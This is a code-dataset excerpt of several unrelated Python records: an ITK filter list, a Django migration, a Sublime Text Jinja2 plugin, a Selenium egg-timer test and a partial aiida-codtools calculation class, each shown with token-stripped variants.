>,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF22', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF23', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF32', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF33', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF42', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF43', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n )\nsnake_case_functions = ('level_set_motion_registration_filter',\n 'pde_deformable_registration_filter',\n 'symmetric_forces_demons_registration_filter',\n 'demons_registration_filter',\n 'multi_resolution_pde_deformable_registration')\n",
"<assignment token>\n"
] | false |
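A note on the snake_case_functions tuple that closes the record above: it pairs each CamelCase filter class with a snake_case alias. The two-pass regex below is a common recipe for deriving such aliases and reproduces the listed pairs; it is an assumed reconstruction for illustration, not code taken from the record.

# Assumed recipe: derive a snake_case alias from a CamelCase class name.
# The record above only lists the resulting pairs; this helper is illustrative.
import re

def to_snake_case(name):
    # Split an acronym run from a following word (PDEDeformable -> PDE_Deformable),
    # then split lower/digit-to-upper boundaries (LevelSet -> Level_Set).
    name = re.sub(r'([A-Z]+)([A-Z][a-z])', r'\1_\2', name)
    name = re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', name)
    return name.lower()

print(to_snake_case('PDEDeformableRegistrationFilter'))
# pde_deformable_registration_filter
print(to_snake_case('SymmetricForcesDemonsRegistrationFilter'))
# symmetric_forces_demons_registration_filter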
99,859 | c86ad03b01554647f3ccf13758f54ddf2a4dc8fd | # Generated by Django 2.0.1 on 2018-01-14 05:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CapApp', '0026_auto_20180112_1929'),
]
operations = [
migrations.AlterField(
model_name='grant',
name='core_project_num',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='grant',
name='pi_name',
field=models.CharField(blank=True, max_length=500, null=True),
),
]
| [
"# Generated by Django 2.0.1 on 2018-01-14 05:07\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('CapApp', '0026_auto_20180112_1929'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='grant',\n name='core_project_num',\n field=models.CharField(blank=True, max_length=30, null=True),\n ),\n migrations.AlterField(\n model_name='grant',\n name='pi_name',\n field=models.CharField(blank=True, max_length=500, null=True),\n ),\n ]\n",
"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('CapApp', '0026_auto_20180112_1929')]\n operations = [migrations.AlterField(model_name='grant', name=\n 'core_project_num', field=models.CharField(blank=True, max_length=\n 30, null=True)), migrations.AlterField(model_name='grant', name=\n 'pi_name', field=models.CharField(blank=True, max_length=500, null=\n True))]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('CapApp', '0026_auto_20180112_1929')]\n operations = [migrations.AlterField(model_name='grant', name=\n 'core_project_num', field=models.CharField(blank=True, max_length=\n 30, null=True)), migrations.AlterField(model_name='grant', name=\n 'pi_name', field=models.CharField(blank=True, max_length=500, null=\n True))]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
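The migration in record 99,859 only relaxes two CharField columns on the Grant model. As a hedged sketch (the model name and app label come from the record; every other field of Grant is unknown and therefore omitted), the model definition after applying the migration would look roughly like this:

# Sketch of the Grant model as the migration above leaves it.
# Only the two altered fields are taken from the record; the rest of the model is assumed away.
from django.db import models

class Grant(models.Model):
    # Both fields become optional: blank values allowed in forms, NULL stored in the database.
    core_project_num = models.CharField(blank=True, max_length=30, null=True)
    pi_name = models.CharField(blank=True, max_length=500, null=True)

    class Meta:
        app_label = 'CapApp'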
99,860 | c87411703594d0e2fba963116acecb8bcabf76bb | import json
import sublime
import sublime_plugin
import os
import re
from .jinja2 import Environment
class PluginMixin():
def get_selection(self):
selections = []
for region in self.view.sel():
if not region.empty():
selections.append(region)
if len(selections) == 0:
# select whole document
selections.append(sublime.Region(0, self.view.size()))
return selections
def get_contents(self):
contents = self.view.substr(sublime.Region(0, self.view.size()))
return contents
def write_new_buffer(self, contents, output_suffix=" - output"):
# Create a new output window
buffername = self.view.name()
filename = self.view.file_name()
new_view = self.view.window().new_file()
if buffername:
new_view.set_name(buffername + output_suffix)
elif filename:
basename = os.path.basename(filename)
new_view.set_name(basename + output_suffix)
else:
new_view.set_name('Untitled' + output_suffix)
new_view.set_scratch(True)
new_view.run_command('my_view_command', {'command': 'set_text', 'text': contents})
def raise_err(self, message, exception_cls=None):
exception_cls = exception_cls or Exception
sublime.active_window().run_command("show_panel", {"panel": "console", "toggle": True})
sublime.status_message(message)
raise exception_cls(message)
class Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):
def run(self, edit):
sublime.active_window().show_input_panel(
"Jinja2 JSON data",
'''[{"value":"hello"}]''',
on_done=self.make_it_so,
on_change=None,
on_cancel=None)
def make_it_so(self, input):
doc = self.get_contents()
generated = []
# get json data
try:
data = json.loads(input)
except Exception as ex:
self.raise_err(str(ex))
# make sure we can iterate
try:
iter(data)
except TypeError as te:
data = list(data)
try:
for templ_vars in data:
result = Environment().from_string(doc).render(templ_vars)
generated.append(result)
except Exception as ex:
self.raise_err(str(ex))
self.write_new_buffer("\n".join(generated))
class MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):
def run(self, edit, **args):
if 'command' not in args:
self.raise_err("No command provided")
if args['command'] == "set_text":
self.view.replace(edit, sublime.Region(0, self.view.size()), args['text'])
else:
self.raise_err("Command not recognized: {}".format(args['command']))
| [
"import json\nimport sublime\nimport sublime_plugin\nimport os\nimport re\nfrom .jinja2 import Environment\n\n\nclass PluginMixin():\n def get_selection(self):\n selections = []\n for region in self.view.sel():\n if not region.empty():\n selections.append(region)\n if len(selections) == 0:\n # select whole document\n selections.append(sublime.Region(0, self.view.size()))\n return selections\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n\n def write_new_buffer(self, contents, output_suffix=\" - output\"):\n # Create a new output window\n buffername = self.view.name()\n filename = self.view.file_name()\n new_view = self.view.window().new_file()\n if buffername:\n new_view.set_name(buffername + output_suffix)\n elif filename:\n basename = os.path.basename(filename)\n new_view.set_name(basename + output_suffix)\n else:\n new_view.set_name('Untitled' + output_suffix)\n new_view.set_scratch(True)\n new_view.run_command('my_view_command', {'command': 'set_text', 'text': contents})\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command(\"show_panel\", {\"panel\": \"console\", \"toggle\": True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n def run(self, edit):\n sublime.active_window().show_input_panel(\n \"Jinja2 JSON data\",\n '''[{\"value\":\"hello\"}]''',\n on_done=self.make_it_so,\n on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n\n # get json data\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n\n # make sure we can iterate\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n\n self.write_new_buffer(\"\\n\".join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err(\"No command provided\")\n\n if args['command'] == \"set_text\":\n self.view.replace(edit, sublime.Region(0, self.view.size()), args['text'])\n else:\n self.raise_err(\"Command not recognized: {}\".format(args['command']))\n",
"import json\nimport sublime\nimport sublime_plugin\nimport os\nimport re\nfrom .jinja2 import Environment\n\n\nclass PluginMixin:\n\n def get_selection(self):\n selections = []\n for region in self.view.sel():\n if not region.empty():\n selections.append(region)\n if len(selections) == 0:\n selections.append(sublime.Region(0, self.view.size()))\n return selections\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n\n def write_new_buffer(self, contents, output_suffix=' - output'):\n buffername = self.view.name()\n filename = self.view.file_name()\n new_view = self.view.window().new_file()\n if buffername:\n new_view.set_name(buffername + output_suffix)\n elif filename:\n basename = os.path.basename(filename)\n new_view.set_name(basename + output_suffix)\n else:\n new_view.set_name('Untitled' + output_suffix)\n new_view.set_scratch(True)\n new_view.run_command('my_view_command', {'command': 'set_text',\n 'text': contents})\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command('show_panel', {'panel':\n 'console', 'toggle': True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n\n def get_selection(self):\n selections = []\n for region in self.view.sel():\n if not region.empty():\n selections.append(region)\n if len(selections) == 0:\n selections.append(sublime.Region(0, self.view.size()))\n return selections\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n\n def write_new_buffer(self, contents, output_suffix=' - output'):\n buffername = self.view.name()\n filename = self.view.file_name()\n new_view = self.view.window().new_file()\n if buffername:\n new_view.set_name(buffername + output_suffix)\n elif filename:\n basename = os.path.basename(filename)\n new_view.set_name(basename + output_suffix)\n else:\n new_view.set_name('Untitled' + output_suffix)\n new_view.set_scratch(True)\n new_view.run_command('my_view_command', {'command': 'set_text',\n 'text': contents})\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command('show_panel', {'panel':\n 'console', 'toggle': True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n <function token>\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n\n def write_new_buffer(self, contents, output_suffix=' - output'):\n buffername = self.view.name()\n filename = self.view.file_name()\n new_view = self.view.window().new_file()\n if buffername:\n new_view.set_name(buffername + output_suffix)\n elif filename:\n basename = os.path.basename(filename)\n new_view.set_name(basename + output_suffix)\n else:\n new_view.set_name('Untitled' + output_suffix)\n new_view.set_scratch(True)\n new_view.run_command('my_view_command', {'command': 'set_text',\n 'text': contents})\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command('show_panel', {'panel':\n 'console', 'toggle': True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n <function token>\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n <function token>\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command('show_panel', {'panel':\n 'console', 'toggle': True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n <function token>\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n <function token>\n <function token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n <function token>\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n <function token>\n <function token>\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n<class token>\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n<class token>\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n <function token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n"
] | false |
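Record 99,860 wires Jinja2 into a Sublime Text command: make_it_so parses a JSON list of variable dicts and renders the buffer contents once per entry. The sketch below reproduces just that render loop outside the editor, so the buffer is a plain string and all sublime/sublime_plugin calls are left out; template_text and json_input are made-up stand-ins.

# Standalone sketch of the plugin's render loop: one render per JSON entry.
# Uses plain jinja2; the Sublime view/buffer handling is intentionally omitted.
import json
from jinja2 import Environment

template_text = "Hello {{ value }}!"          # stand-in for the buffer contents
json_input = '[{"value": "world"}, {"value": "again"}]'

data = json.loads(json_input)                  # raises ValueError on malformed JSON
generated = []
for templ_vars in data:
    # Environment().from_string(...).render(...) mirrors the plugin's call.
    generated.append(Environment().from_string(template_text).render(templ_vars))

print("\n".join(generated))                    # the plugin writes this to a new buffer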
99,861 | 7ede0e24e998a050a49025dbf1b0be0b115411b7 | from selenium import webdriver
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
import sched
import time
from datetime import datetime
class Eggtests:
def setup(self):
self.driver = webdriver.Chrome()
self.driver.get('https://e.ggtimer.com/')
self.driver.maximize_window()
my_element = WebDriverWait(self.driver, 3).until(EC.visibility_of_all_elements_located((By.ID,'start_a_timer')))
def test(self, interval):
self.set_item(interval)
self.click_go()
first_display_value = self.get_first_display_number()
self.check_timer(first_display_value)
def set_item(self, interval):
item_element = self.driver.find_element(By.ID, 'start_a_timer')
item_element.clear()
self.input_interval = int(interval)
item_element.send_keys(interval)
def click_go(self):
go_button = self.driver.find_element(By.ID, 'timergo')
#System time before the click button
self.go_button_click_time = datetime.now()
go_button.submit()
def get_first_display_number(self):
return self.get_display_number();
def get_display_number(self):
timer_element = self.driver.find_element(By.ID, 'progressText')
string_value_read = timer_element.text
#split on space and get 1st value
string_array = string_value_read.split(" ")
number_value_read = string_array[0]
int_value_read = int(number_value_read)
return int_value_read
def get_time_elapesed_from_click_go(self):
#current system time minus the time when go was clicked in seconds
diff_in_float = (datetime.now() - self.go_button_click_time).total_seconds()
diff_in_int = int(diff_in_float)
#return input count minus the difference in seconds
return self.input_interval - diff_in_int
def check_timer(self, int_value):
if int_value > 0:
elapsed_time = self.get_time_elapesed_from_click_go()
int_value_read = self.get_display_number()
assert int_value_read == int_value
if int_value >= 0:
s = sched.scheduler(time.time, time.sleep)
s.enter(1, 1, self.check_timer, argument=(int_value-1,))
s.run()
if int_value < 0:
alert = self.driver.switch_to.alert
alert.accept()
def tear_down(self):
self.driver.close()
        print('Test finished')
| [
"from selenium import webdriver\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nimport sched\r\nimport time\r\nfrom datetime import datetime\r\n\r\nclass Eggtests:\r\n\r\n def setup(self):\r\n self.driver = webdriver.Chrome()\r\n self.driver.get('https://e.ggtimer.com/')\r\n self.driver.maximize_window()\r\n my_element = WebDriverWait(self.driver, 3).until(EC.visibility_of_all_elements_located((By.ID,'start_a_timer')))\r\n\r\n def test(self, interval):\r\n self.set_item(interval)\r\n self.click_go()\r\n first_display_value = self.get_first_display_number()\r\n self.check_timer(first_display_value)\r\n\r\n def set_item(self, interval):\r\n item_element = self.driver.find_element(By.ID, 'start_a_timer')\r\n item_element.clear()\r\n self.input_interval = int(interval)\r\n item_element.send_keys(interval)\r\n\r\n def click_go(self):\r\n go_button = self.driver.find_element(By.ID, 'timergo')\r\n #System time before the click button\r\n self.go_button_click_time = datetime.now()\r\n go_button.submit()\r\n\r\n def get_first_display_number(self):\r\n return self.get_display_number();\r\n\r\n def get_display_number(self):\r\n timer_element = self.driver.find_element(By.ID, 'progressText')\r\n string_value_read = timer_element.text\r\n #split on space and get 1st value\r\n string_array = string_value_read.split(\" \")\r\n number_value_read = string_array[0]\r\n int_value_read = int(number_value_read)\r\n return int_value_read\r\n\r\n def get_time_elapesed_from_click_go(self):\r\n #current system time minus the time when go was clicked in seconds\r\n diff_in_float = (datetime.now() - self.go_button_click_time).total_seconds()\r\n diff_in_int = int(diff_in_float)\r\n #return input count minus the difference in seconds\r\n return self.input_interval - diff_in_int\r\n\r\n def check_timer(self, int_value):\r\n\r\n if int_value > 0:\r\n elapsed_time = self.get_time_elapesed_from_click_go()\r\n int_value_read = self.get_display_number()\r\n assert int_value_read == int_value\r\n\r\n if int_value >= 0:\r\n s = sched.scheduler(time.time, time.sleep)\r\n s.enter(1, 1, self.check_timer, argument=(int_value-1,))\r\n s.run()\r\n\r\n if int_value < 0:\r\n alert = self.driver.switch_to.alert\r\n alert.accept()\r\n\r\n def tear_down(self):\r\n self.driver.close()\r\n print 'Test finished'\r\n"
] | true |
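The interesting part of record 99,861 is the bookkeeping in get_time_elapesed_from_click_go and check_timer: the remaining count is the configured interval minus the whole seconds elapsed since the go button was clicked. The sketch below isolates that arithmetic without a browser and without the sched-based recursion; the interval value and the sleep are made-up stand-ins.

# Sketch of the countdown bookkeeping used above, without a browser:
# remaining = configured interval minus whole seconds elapsed since "go" was clicked.
from datetime import datetime
import time

input_interval = 5                      # seconds, stand-in for the text-box value
go_button_click_time = datetime.now()   # recorded just before the (simulated) click

time.sleep(2)                           # pretend the timer has been running a while

elapsed = int((datetime.now() - go_button_click_time).total_seconds())
remaining = input_interval - elapsed
print(remaining)                        # expected to print 3 here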
99,862 | ca004f2f07f30a5be35f77d21a021c79ea2fd4b1 | # -*- coding: utf-8 -*-
"""Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts."""
import copy
from aiida.common import datastructures, exceptions
from aiida.engine import CalcJob
from aiida.orm import CifData, Dict
class CifBaseCalculation(CalcJob):
"""Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts."""
_default_parser = 'codtools.cif_base'
_default_cli_parameters = {}
@classmethod
def define(cls, spec):
# yapf: disable
super().define(spec)
spec.input('metadata.options.input_filename', valid_type=str, default='aiida.in',
help='Filename to which the input for the code that is to be run will be written.')
spec.input('metadata.options.output_filename', valid_type=str, default='aiida.out',
help='Filename to which the content of stdout of the code that is to be run will be written.')
spec.input('metadata.options.error_filename', valid_type=str, default='aiida.err',
help='Filename to which the content of stderr of the code that is to be run will be written.')
spec.input('metadata.options.parser_name', valid_type=str, default=cls._default_parser,
help='Define the parser to be used by setting its entry point name.')
spec.input('metadata.options.attach_messages', valid_type=bool, default=False,
help='When True, warnings and errors written to stderr will be attached as the `messages` output node')
spec.input('cif', valid_type=CifData, required=True,
help='The CIF to be processed.')
spec.input('parameters', valid_type=Dict, required=False,
help='Command line parameters.')
spec.output('messages', valid_type=Dict, required=False,
help='Warning and error messages returned by script.')
spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES',
message='Neither the output for the error file could be read from the retrieved folder.')
spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE',
message='The output file could not be read from the retrieved folder.')
spec.exit_code(312, 'ERROR_READING_ERROR_FILE',
message='The error file could not be read from the retrieved folder.')
spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE',
message='The output file is empty.')
spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION',
message='Invalid command line option passed.')
spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA',
message='The output file could not be parsed.')
spec.exit_code(410, 'ERROR_PARSING_CIF_DATA',
message='The output file could not be parsed into a CifData object.')
def _validate_resources(self):
"""Validate the resources defined in the options."""
resources = self.options.resources
for key in ['num_machines', 'num_mpiprocs_per_machine', 'tot_num_mpiprocs']:
if key in resources and resources[key] != 1:
raise exceptions.FeatureNotAvailable(
f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: '
'parallelization is not supported, only a value of `1` is accepted.'
)
def prepare_for_submission(self, folder):
"""This method is called prior to job submission with a set of calculation input nodes.
The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a
temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to
the remote machine before job submission, as well as file lists that are to be retrieved after job completion.
:param folder: an aiida.common.folders.Folder to temporarily write files on disk
:returns: CalcInfo instance
"""
from aiida_codtools.cli.utils.parameters import CliParameters
try:
parameters = self.inputs.parameters.get_dict()
except AttributeError:
parameters = {}
self._validate_resources()
cli_parameters = copy.deepcopy(self._default_cli_parameters)
cli_parameters.update(parameters)
codeinfo = datastructures.CodeInfo()
codeinfo.code_uuid = self.inputs.code.uuid
codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters).get_list()
codeinfo.stdin_name = self.options.input_filename
codeinfo.stdout_name = self.options.output_filename
codeinfo.stderr_name = self.options.error_filename
calcinfo = datastructures.CalcInfo()
